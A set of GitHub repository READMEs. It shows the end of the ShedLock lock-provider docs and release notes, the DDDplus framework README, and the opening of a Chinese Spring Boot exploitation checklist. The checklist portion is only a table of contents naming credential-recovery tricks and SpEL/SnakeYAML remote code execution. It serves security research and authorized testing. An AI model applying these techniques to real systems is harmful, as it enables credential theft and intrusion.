<version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.core.LockConfiguration; ... @Bean Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) { return new Neo4jLockProvider(driver); } ``` Please make sure that ```neo4j-java-driver``` version used by ```shedlock-provider-neo4j``` matches the driver version used in your project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively). #### Etcd Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-etcd-jetcd</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider; ... @Bean public LockProvider lockProvider(Client client) { return new EtcdLockProvider(client); } ``` #### Apache Ignite Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-ignite</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider; ... @Bean public LockProvider lockProvider(Ignite ignite) { return new IgniteLockProvider(ignite); } ``` #### In-Memory If you want to use a lock provider in tests there is an in-Memory implementation. Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-inmemory</artifactId> <version>5.13.0</version> <scope>test</scope> </dependency> ``` ```java import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider; ... @Bean public LockProvider lockProvider() { return new InMemoryLockProvider(); } ``` #### Memcached (using spymemcached) Please, be aware that memcached is not a database but a cache. It means that if the cache is full, [the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364) **Use only if you know what you are doing.** Import ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-memcached-spy</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider; ... @Bean public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) { return new MemcachedLockProvider(client, ENV); } ``` P.S.: Memcached Standard Protocol: - A key (arbitrary string up to 250 bytes in length. No space or newlines for ASCII mode) - An expiration time, in `seconds`. '0' means never expire. Can be up to 30 days. After 30 days, is treated as a unix timestamp of an exact date. (support `seconds`、`minutes`、`days`, and less than `30` days) #### Datastore Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-datastore</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider; ... @Bean public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) { return new DatastoreLockProvider(datastore); } ``` #### Spanner Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-spanner</artifactId> <version>5.13.0</version> </dependency> ``` Configure ```java import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider; ... // Basic @Bean public LockProvider lockProvider(DatabaseClient databaseClient) { return new SpannerLockProvider(databaseClientSupplier); } // Custom host, table and column names @Bean public LockProvider lockProvider(DatabaseClient databaseClient) { var config = SpannerLockProvider.Configuration.builder() .withDatabaseClient(databaseClientSupplier) .withTableConfiguration(SpannerLockProvider.TableConfiguration.builder() ... // Custom table and column names .build()) .withHostName("customHostName") .build(); return new SpannerLockProvider(config); } ``` ## Multi-tenancy If you have multi-tenancy use-case you can use a lock provider similar to this one (see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87)) ```java private static abstract class MultiTenancyLockProvider implements LockProvider { private final ConcurrentHashMap<String, LockProvider> providers = new ConcurrentHashMap<>(); @Override public @NonNull Optional<SimpleLock> lock(@NonNull LockConfiguration lockConfiguration) { String tenantName = getTenantName(lockConfiguration); return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration); } protected abstract LockProvider createLockProvider(String tenantName) ; protected abstract String getTenantName(LockConfiguration lockConfiguration); } ``` ## Customization You can customize the behavior of the library by implementing `LockProvider` interface. Let's say you want to implement a special behavior after a lock is obtained. You can do it like this: ```java public class MyLockProvider implements LockProvider { private final LockProvider delegate; public MyLockProvider(LockProvider delegate) { this.delegate = delegate; } @Override public Optional<SimpleLock> lock(LockConfiguration lockConfiguration) { Optional<SimpleLock> lock = delegate.lock(lockConfiguration); if (lock.isPresent()) { // do something } return lock; } } ``` ## Duration specification All the annotations where you need to specify a duration support the following formats * duration+unit - `1s`, `5ms`, `5m`, `1d` (Since 4.0.0) * duration in ms - `100` (only Spring integration) * ISO-8601 - `PT15M` (see [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation) ## Extending the lock There are some use-cases which require to extend currently held lock. You can use LockExtender in the following way: ```java LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO); ``` Please note that not all lock provider implementations support lock extension. ## KeepAliveLockProvider There is also KeepAliveLockProvider that is able to keep the lock alive by periodically extending it. It can be used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases, it adds more complexity to the library and the flow is harder to reason about so please use moderately. ```java @Bean public LockProvider lockProvider(...) { return new KeepAliveLockProvider(new XyzProvider(...), scheduler); } ``` KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if the lockAtMostFor is 10 minutes the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension, single thread should be enough. ## Micronaut integration Since version 4.0.0, it's possible to use Micronaut framework for integration Import the project: ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <!-- Micronaut 3 --> <artifactId>shedlock-micronaut</artifactId> <!-- For Micronaut 4 use --> <!-- <artifactId>shedlock-micronaut4</artifactId> --> <version>5.13.0</version> </dependency> ``` Configure default lockAtMostFor value (application.yml): ```yaml shedlock: defaults: lock-at-most-for: 1m ``` Configure lock provider: ```java @Singleton public LockProvider lockProvider() { ... select and configure your lock provider } ``` Configure the scheduled task: ```java @Scheduled(fixedDelay = "1s") @SchedulerLock(name = "myTask") public void myTask() { assertLocked(); ... } ``` ## CDI integration Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus) Import the project: ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <!-- use shedlock-cdi-vintage for quarkus 2.x --> <artifactId>shedlock-cdi</artifactId> <version>5.13.0</version> </dependency> ``` Configure default lockAtMostFor value (application.properties): ```properties shedlock.defaults.lock-at-most-for=PT30S ``` Configure lock provider: ```java @Produces @Singleton public LockProvider lockProvider() { ... } ``` Configure the scheduled task: ```java @Scheduled(every = "1s") @SchedulerLock(name = "myTask") public void myTask() { assertLocked(); ... } ``` The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api` so it should be usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus. It's built on top of javax annotation as Quarkus has not moved to Jakarta EE namespace yet. The support is minimalistic, for example there is no support for expressions in the annotation parameters yet, if you need it, feel free to send a PR. ## Locking without a framework It is possible to use ShedLock without a framework ```java LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider); ... Instant lockAtMostUntil = Instant.now().plusSeconds(600); executor.executeWithLock(runnable, new LockConfiguration("lockName", lockAtMostUntil)); ``` ## Extending the lock Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation, directly using `LockProvider` and calling `extend` method on the `SimpleLock`. ## Modes of Spring integration ShedLock supports two modes of Spring integration. One that uses an AOP proxy around scheduled method (PROXY_METHOD) and one that proxies TaskScheduler (PROXY_SCHEDULER) #### Scheduled Method proxy Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method. The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism. The disadvantage is that the lock is applied even if you call the method directly. If the method returns a value and the lock is held by another process, null or an empty Optional will be returned (primitive return types are not supported). Final and non-public methods are not proxied so either you have to make your scheduled methods public and non-final or use TaskScheduler proxy. ![Method proxy sequenceDiagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png) #### TaskScheduler proxy This mode wraps Spring `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries** like opentelementry that also wrap TaskScheduler. Please only use it if you know what you are doing. It can be switched-on like this (PROXY_SCHEDULER was the default method before 4.0.0): ```java @EnableSchedulerLock(interceptMode = PROXY_SCHEDULER) ``` If you do not specify your task scheduler, a default one is created for you. If you have special needs, just create a bean implementing `TaskScheduler` interface and it will get wrapped into the AOP proxy automatically. ```java @Bean public TaskScheduler taskScheduler() { return new MySpecialTaskScheduler(); } ``` Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically get used by the tasks scheduling mechanism. ![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png) ### Spring XML configuration Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed. ## Lock assert To prevent misconfiguration errors, like AOP misconfiguration, missing annotation etc., you can assert that the lock works by using LockAssert: ```java @Scheduled(...) @SchedulerLock(..) public void scheduledTask() { // To assert that the lock is held (prevents misconfiguration errors) LockAssert.assertLocked(); // do something } ``` In unit tests you can switch-off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)). ## Kotlin gotchas The library is tested with Kotlin and works fine. The only issue is Spring AOP which does not work on final method. If you use `@SchedulerLock` with `@Component` annotation, everything should work since Kotlin Spring compiler plugin will automatically 'open' the method for you. If `@Component` annotation is not present, you have to open the method by yourself. (see [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details) ## Caveats Locks in ShedLock have an expiration time which leads to the following possible issues. 1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once 2. If the clock difference between two nodes is more than `lockAtLeastFor` or minimal execution time the task can be executed more than once. ## Troubleshooting Help, ShedLock does not do what it's supposed to do! 1. Upgrade to the newest version 2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured. - If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying)) 3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured. If there is more than one record with the same name, you are missing a primary key. 4. Use ShedLock debug log. ShedLock logs interesting information on DEBUG level with logger name `net.javacrumbs.shedlock`. It should help you to see what's going on. 5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one after another, `lockAtLeastFor` can prevent it. # Release notes ## 5.13.0 (2024-04-05) * #1779 Ability to rethrow unexpected exception in JdbcTemplateStorageAccessor * Dependency updates ## 5.12.0 (2024-02-29) * #1800 Enable lower case for database type when using usingDbTime() * #1804 Startup error with Neo4j 5.17.0 * Dependency updates ## 4.47.0 (2024-03-01) * #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1) ## 5.11.0 (2024-02-13) * #1753 Fix SpEL for methods with parameters * Dependency updates ## 5.10.2 (2023-12-07) * #1635 fix makeAllAssertsPass locks only once * Dependency updates ## 5.10.1 (2023-12-06) * #1635 fix makeAllAssertsPass(false) throws NoSuchElementException * Dependency updates ## 5.10.0 (2023-11-07) * SpannerLockProvider added (thanks @pXius) * Dependency updates ## 5.9.1 (2023-10-19) * QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino) ## 5.9.0 (2023-10-15) * Support Quarkus 2 Redis client (thanks @ricardojlrufino) * Better handling of timeouts in ReactiveStreamsMongoLockProvider * Dependency updates ## 5.8.0 (2023-09-15) * Support for Micronaut 4 * Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic) * Dependency updates ## 5.7.0 (2023-08-25) * JedisLockProvider supports extending (thanks @shotmk) * Better behavior when locks are nested #1493 ## 4.46.0 (2023-09-05) * JedisLockProvider (version 3) supports extending (thanks @shotmk) ## 4.45.0 (2023-09-04) * JedisLockProvider supports extending (thanks @shotmk) ## 5.6.0 * Ability to explicitly set database product in JdbTemplateLockProvider (thanks @metron2) * Removed forgotten versions from BOM * Dependency updates ## 5.5.0 (2023-06-19) * Datastore support (thanks @mmastika) * Dependency updates ## 5.4.0 (2023-06-06) * Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam) * Dependency updates ## 5.3.0 (2023-05-13) * Added shedlock-cdi module (supports newest CDI version) * Dependency updates ## 5.2.0 (2023-03-06) * Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF) * Dependency updates ## 5.1.0 (2023-01-07) * Added SpEL support to @SchedulerLock name attribute (thanks @ipalbeniz) * Dependency updates ## 5.0.1 (2022-12-10) * Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272 ## 4.44.0 (2022-12-29) * Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a ## 5.0.0 (2022-12-10) * Requires JDK 17 * Tested with Spring 6 (Spring Boot 3) * Micronaut updated to 3.x.x * R2DBC 1.x.x (still sucks) * Spring Data 3.x.x * Rudimentary support for CDI (tested with quarkus) * New jOOQ lock provider * SLF4j 2 * Deleted all deprecated code and support for old versions of libraries ## 4.43.0 (2022-12-04) * Better logging in JdbcTemplateProvider * Dependency updates ## 4.42.0 (2022-09-16) * Deprecate old Couchbase lock provider * Dependency updates ## 4.41.0 (2022-08-17) * Couchbase collection support (thanks @mesuutt) * Dependency updates ## 4.40.0 (2022-08-11) * Fixed caching issues when the app is started by the DB does not exist yet (#1129) * Dependency updates ## 4.39.0 (2022-07-26) * Introduced elasticsearch8 LockProvider and deperecated the orignal one (thanks @MarAra) * Dependency updates ## 4.38.0 (2022-07-02) * ReactiveRedisLockProvider added (thanks @ericwcc) * Dependency updates ## 4.37.0 (2022-06-14) * OpenSearch provider (thanks @Pinny3) * Fix wrong reference to reactive Mongo in BOM #1048 * Dependency updates ## 4.36.0 (2022-05-28) * shedlock-bom module added * Dependency updates ## 4.35.0 (2022-05-16) * Neo4j allows to specify database thanks @SergeyPlatonov * Dependency updates ## 4.34.0 (2022-04-09) * Dropped support for Hazelcast <= 3 as it has unfixed vulnerability * Dropped support for Spring Data Redis 1 as it is not supported * Dependency updates ## 4.33.0 * memcached provider added (thanks @pinkhello) * Dependency updates ## 4.32.0 * JDBC provider does not change autocommit attribute * Dependency updates ## 4.31.0 * Jedis 4 lock provider * Dependency updates ## 4.30.0 * In-memory lock provider added (thanks @kkocel) * Dependency updates ## 4.29.0 * R2DBC support added (thanks @sokomishalov) * Library upgrades ## 4.28.0 * Neo4j lock provider added (thanks @thimmwork) * Library upgrades ## 4.27.0 * Ability to set transaction isolation in JdbcTemplateLockProvider * Library upgrades ## 4.26.0 * KeepAliveLockProvider introduced * Library upgrades ## 4.25.0 * LockExtender added ## 4.24.0 * Support for Apache Ignite (thanks @wirtsleg) * Library upgrades ## 4.23.0 * Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan) * Introduced shedlock-provider-jdbc-micronaut module (thanks @drmaas) ## 4.22.1 * Catching and logging Cassandra exception ## 4.22.0 * Support for custom keyspace in Cassandra provider ## 4.21.0 * Elastic unlock using IMMEDIATE refresh policy #422 * DB2 JDBC lock provider uses microseconds in DB time * Various library upgrades ## 4.20.1 * Fixed DB JDBC server time #378 ## 4.20.0 * Support for etcd (thanks grofoli) ## 4.19.1 * Fixed devtools compatibility #368 ## 4.19.0 * Support for enhanced configuration in Cassandra provider (thanks DebajitKumarPhukan) * LockConfigurationExtractor exposed as a Spring bean #359 * Handle CannotSerializeTransactionException #364 ## 4.18.0 * Fixed Consul support for tokens and added enhanced Consul configuration (thanks DrWifey) ## 4.17.0 * Consul support for tokens ## 4.16.0 * Spring - EnableSchedulerLock.order param added to specify AOP proxy order * JDBC - Log unexpected exceptions at ERROR level * Hazelcast upgraded to 4.1 ## 4.15.1 * Fix session leak in Consul provider #340 (thanks @haraldpusch) ## 4.15.0 * ArangoDB lock provider added (thanks @patrick-birkle) ## 4.14.0 * Support for Couchbase 3 driver (thanks @blitzenzzz) * Removed forgotten configuration files form micronaut package (thanks @drmaas) * Shutdown hook for Consul (thanks @kaliy) ## 4.13.0 * Support for Consul (thanks @kaliy) * Various dependencies updated * Deprecated default LockConfiguration constructor ## 4.12.0 * Lazy initialization of SqlStatementsSource #258 ## 4.11.1 * MongoLockProvider uses mongodb-driver-sync * Removed deprecated constructors from MongoLockProvider ## 4.10.1 * New Mongo reactive streams driver (thanks @codependent) ## 4.9.3 * Fixed JdbcTemplateLockProvider useDbTime() locking #244 thanks @gjorgievskivlatko ## 4.9.2 * Do not fail on DB type determining code if DB connection is not available ## 4.9.1 * Support for server time in DB2 * removed shedlock-provider-jdbc-internal module ## 4.9.0 * Support for server time in JdbcTemplateLockProvider * Using custom non-null annotations * Trimming time precision to milliseconds * Micronaut upgraded to 1.3.4 * Add automatic DB tests for Oracle, MariaDB and MS SQL. ## 4.8.0 * DynamoDB 2 module introduced (thanks Mark Egan) * JDBC template code refactored to not log error on failed insert in Postgres * INSERT .. ON CONFLICT UPDATE is used for Postgres ## 4.7.1 * Make LockAssert.TestHelper public ## 4.7.0 * New module for Hazelcasts 4 * Ability to switch-off LockAssert in unit tests ## 4.6.0 * Support for Meta annotations and annotation inheritance in Spring ## 4.5.2 * Made compatible with PostgreSQL JDBC Driver 42.2.11 ## 4.5.1 * Inject redis template ## 4.5.0 * ClockProvider introduced * MongoLockProvider(MongoDatabase) introduced ## 4.4.0 * Support for non-void returning methods when PROXY_METHOD interception is used ## 4.3.1 * Introduced shedlock-provider-redis-spring-1 to make it work around Spring Data Redis 1 issue #105 (thanks @rygh4775) ## 4.3.0 * Jedis dependency upgraded to 3.2.0 * Support for JedisCluster * Tests upgraded to JUnit 5 ## 4.2.0 * Cassandra provider (thanks @mitjag) ## 4.1.0 * More configuration option for JdbcTemplateProvider ## 4.0.4 * Allow configuration of key prefix in RedisLockProvider #181 (thanks @krm1312) ## 4.0.3 * Fixed junit dependency scope #179 ## 4.0.2 * Fix NPE caused by Redisson #178 ## 4.0.1 * DefaultLockingTaskExecutor made reentrant #175 ## 4.0.0 Version 4.0.0 is a major release changing quite a lot of stuff * `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation has been in wrong module and was too complex. Please use the new annotation, the old one still works, but in few years it will be removed. * Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still use `PROXY_SCHEDULER` mode if you specify it manually. * Support for more readable [duration strings](#duration-specification) * Support for lock assertion `LockAssert.assertLocked()` * [Support for Micronaut](#micronaut-integration) added ## 3.0.1 * Fixed bean definition configuration #171 ## 3.0.0 * `EnableSchedulerLock.mode` renamed to `interceptMode` * Use standard Spring AOP configuration to honor Spring Boot config (supports `proxyTargetClass` flag) * Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes * Removed support for XML configuration ## 2.6.0 * Updated dependency to Spring 2.1.9 * Support for lock extensions (beta) ## 2.5.0 * Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params * Better debug logging ## 2.4.0 * Fixed potential deadlock in Hazelcast (thanks @HubertTatar) * Finding class level annotation in proxy method mode (thanks @volkovs) * ScheduledLockConfigurationBuilder deprecated ## 2.3.0 * LockProvides is initialized lazilly so it does not change DataSource initialization order ## 2.2.1 * MongoLockProvider accepts MongoCollection as a constructor param ## 2.2.0 * DynamoDBLockProvider added ## 2.1.0 * MongoLockProvider rewritten to use upsert * ElasticsearchLockProvider added ## 2.0.1 * AOP proxy and annotation configuration support ## 1.3.0 * Can set Timezone to JdbcTemplateLock provider ## 1.2.0 * Support for Couchbase (thanks to @MoranVaisberg) ## 1.1.1 * Spring RedisLockProvider refactored to use RedisTemplate ## 1.1.0 * Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz) ## 1.0.0 * Upgraded dependencies to Spring 5 and Spring Data 2 * Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvide instead) * Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead) ## 0.18.2 * ablility to clean lock cache ## 0.18.1 * shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x ## 0.18.0 * Added shedlock-provider-redis-spring (thanks to @siposr) * shedlock-provider-jedis moved to shedlock-provider-redis-jedis ## 0.17.0 * Support for SPEL in lock name annotation ## 0.16.1 * Automatically closing TaskExecutor on Spring shutdown ## 0.16.0 * Removed spring-test from shedlock-spring compile time dependencies * Added Automatic-Module-Names ## 0.15.1 * Hazelcast works with remote cluster ## 0.15.0 * Fixed ScheduledLockConfigurationBuilder interfaces #32 * Hazelcast code refactoring ## 0.14.0 * Support for Hazelcast (thanks to @peyo) ## 0.13.0 * Jedis constructor made more generic (thanks to @mgrzeszczak) ## 0.12.0 * Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString * Support for composed annotations * ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory) ## 0.11.0 * Support for Redis (thanks to @clamey) * Checking that lockAtMostFor is in the future * Checking that lockAtMostFor is larger than lockAtLeastFor ## 0.10.0 * jdbc-template-provider does not participate in task transaction ## 0.9.0 * Support for @SchedulerLock annotations on proxied classes ## 0.8.0 * LockableTaskScheduler made AutoClosable so it's closed upon Spring shutdown ## 0.7.0 * Support for lockAtLeastFor ## 0.6.0 * Possible to configure defaultLockFor time so it does not have to be repeated in every annotation ## 0.5.0 * ZooKeeper nodes created under /shedlock by default ## 0.4.1 * JdbcLockProvider insert does not fail on DataIntegrityViolationException ## 0.4.0 * Extracted LockingTaskExecutor * LockManager.executeIfNotLocked renamed to executeWithLock * Default table name in JDBC lock providers ## 0.3.0 * `@ShedlulerLock.name` made obligatory * `@ShedlulerLock.lockForMillis` renamed to lockAtMostFor * Adding plain JDBC LockProvider * Adding ZooKeepr LockProvider
0
funkygao/cp-ddd-framework
轻量级DDD正向/逆向业务建模框架,支撑复杂业务系统的架构演化!
architecture clean-architecture ddd ddd-architecture dddplus domain-driven-design enterprise-architecture extension framework modeling reverse-engineering
<h1 align="center">DDDplus</h1> <div align="center"> A lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! [![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI) [![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/) [![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus) ![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg) [![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework) [![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm) [![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community) </div> <div align="center"> Languages: English | [中文](README.zh-cn.md) </div> ---- ## What is DDDplus? DDDplus, formerly named cp-ddd-framework(cp means Central Platform:中台), is a lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! >It captures DDD missing concepts and patches the building block. It empowers building domain model with forward and reverse modeling. It visualizes the complete domain knowledge from code. It connects frontline developers with (architect, product manager, business stakeholder, management team). It makes (analysis, design, design review, implementation, code review, test) a positive feedback closed-loop. It strengthens building extension oriented flexible software solution. It eliminates frequently encountered misunderstanding of DDD via thorough javadoc for each building block with detailed example. In short, the 3 most essential `plus` are: 1. [patch](/dddplus-spec/src/main/java/io/github/dddplus/model) DDD building blocks for pragmatic forward modeling, clearing obstacles of DDD implementation 2. offer a reverse modeling [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), visualizing complete domain knowledge from code 3. provide [extension point](/dddplus-spec/src/main/java/io/github/dddplus/ext) with multiple routing mechanism, suited for complex business scenarios ## Current status Used for several complex critical central platform projects in production environment. ## Showcase [A full demo of DDDplus forward/reverse modeling ->](dddplus-test/src/test/java/ddd/plus/showcase/README.md) ## Quickstart ### Forward modeling ```xml <dependency> <groupId>io.github.dddplus</groupId> <artifactId>dddplus-runtime</artifactId> </dependency> ``` #### Integration with SpringBoot ```java @SpringBootApplication(scanBasePackages = {"${your base packages}", "io.github.dddplus"}) public class Application { public static void main(String[] args) { SpringApplication.run(Application.class); } } ``` ### Reverse Modeling Please check out the [《step by step guide》](doc/ReverseModelingGuide.md). ```xml <dependency> <groupId>io.github.dddplus</groupId> <artifactId>dddplus-spec</artifactId> </dependency> ``` Annotate your code With [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), DDDplus will parse AST and render domain model in multiple views. ```bash mvn io.github.dddplus:dddplus-maven-plugin:model \ -DrootDir=${colon separated source code dirs} \ -DplantUml=${target business model in svg format} \ -DtextModel=${target business model in txt format} ``` ### Architecture Guard ```bash mvn io.github.dddplus:dddplus-maven-plugin:enforce \ -DrootPackage={your pkg} \ -DrootDir={your src dir} ``` ## Known Issues - reverse modeling assumes unique class names within a code repo ## Contribution You are welcome to contribute to the project with pull requests on GitHub. If you find a bug or want to request a feature, please use the [Issue Tracker](https://github.com/funkygao/cp-ddd-framework/issues). For any question, you can use [Gitter Chat](https://gitter.im/cp-ddd-framework/community) to ask. ## Licensing DDDplus is licensed under the Apache License, Version 2.0 (the "License"); you may not use this project except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0).
0
LandGrey/SpringBootVulExploit
SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list
rce spring-actuator-vulnerability spring-boot-vulnerability spring-vulnerability springboot springboot-actuator-rce springcloud vulnerability
# Spring Boot Vulnerability Exploit Check List Spring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list ## 声明 > **⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责** 目录 ----------------- * [Spring Boot Vulnerability Exploit Check List](#spring-boot-vulnerability-exploit-check-list) * [零:路由和版本](#零路由和版本) * [0x01:路由知识](#0x01路由知识) * [0x02:版本知识](#0x02版本知识) * [组件版本的相互依赖关系:](#组件版本的相互依赖关系) * [Spring Cloud 与 Spring Boot 版本之间的依赖关系:](#spring-cloud-与-spring-boot-版本之间的依赖关系) * [Spring Cloud 小版本号的后缀及含义:](#spring-cloud-小版本号的后缀及含义) * [一:信息泄露](#一信息泄露) * [0x01:路由地址及接口调用详情泄漏](#0x01路由地址及接口调用详情泄漏) * [0x02:配置不当而暴露的路由](#0x02配置不当而暴露的路由) * [0x03:获取被星号脱敏的密码的明文 (方法一)](#0x03获取被星号脱敏的密码的明文-方法一) * [利用条件:](#利用条件) * [利用方法:](#利用方法) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名) * [步骤二: jolokia 调用相关 Mbean 获取明文](#步骤二-jolokia-调用相关-mbean-获取明文) * [0x04:获取被星号脱敏的密码的明文 (方法二)](#0x04获取被星号脱敏的密码的明文-方法二) * [利用条件:](#利用条件-1) * [利用方法:](#利用方法-1) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-1) * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求) * [步骤三: 设置 eureka.client.serviceUrl.defaultZone 属性](#步骤三-设置-eurekaclientserviceurldefaultzone-属性) * [步骤四: 刷新配置](#步骤四-刷新配置) * [步骤五: 解码属性值](#步骤五-解码属性值) * [0x05:获取被星号脱敏的密码的明文 (方法三)](#0x05获取被星号脱敏的密码的明文-方法三) * [利用条件:](#利用条件-2) * [利用方法:](#利用方法-2) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-2) * [步骤二: 使用 nc 监听 HTTP 请求](#步骤二-使用-nc-监听-http-请求-1) * [步骤三: 触发对外 http 请求](#步骤三-触发对外-http-请求) * [步骤四: 刷新配置](#步骤四-刷新配置-1) * [0x06:获取被星号脱敏的密码的明文 (方法四)](#0x06获取被星号脱敏的密码的明文-方法四) * [利用条件:](#利用条件-3) * [利用方法:](#利用方法-3) * [步骤一: 找到想要获取的属性名](#步骤一-找到想要获取的属性名-3) * [步骤二: 下载 jvm heap 信息](#步骤二-下载-jvm-heap-信息) * [步骤三: 使用 MAT 获得 jvm heap 中的密码明文](#步骤三-使用-mat-获得-jvm-heap-中的密码明文) * [二:远程代码执行](#二远程代码执行) * [0x01:whitelabel error page SpEL RCE](#0x01whitelabel-error-page-spel-rce) * [利用条件:](#利用条件-4) * [利用方法:](#利用方法-4) * [步骤一:找到一个正常传参处](#步骤一找到一个正常传参处) * [步骤二:执行 SpEL 表达式](#步骤二执行-spel-表达式) * [漏洞原理:](#漏洞原理) * [漏洞分析:](#漏洞分析) * [漏洞环境:](#漏洞环境) * [0x02:spring cloud SnakeYAML RCE](#0x02spring-cloud-snakeyaml-rce) * [利用条件:](#利用条件-5) * [利用方法:](#利用方法-5) * [步骤一: 托管 yml 和 jar 文件](#步骤一-托管-yml-和-jar-文件) * 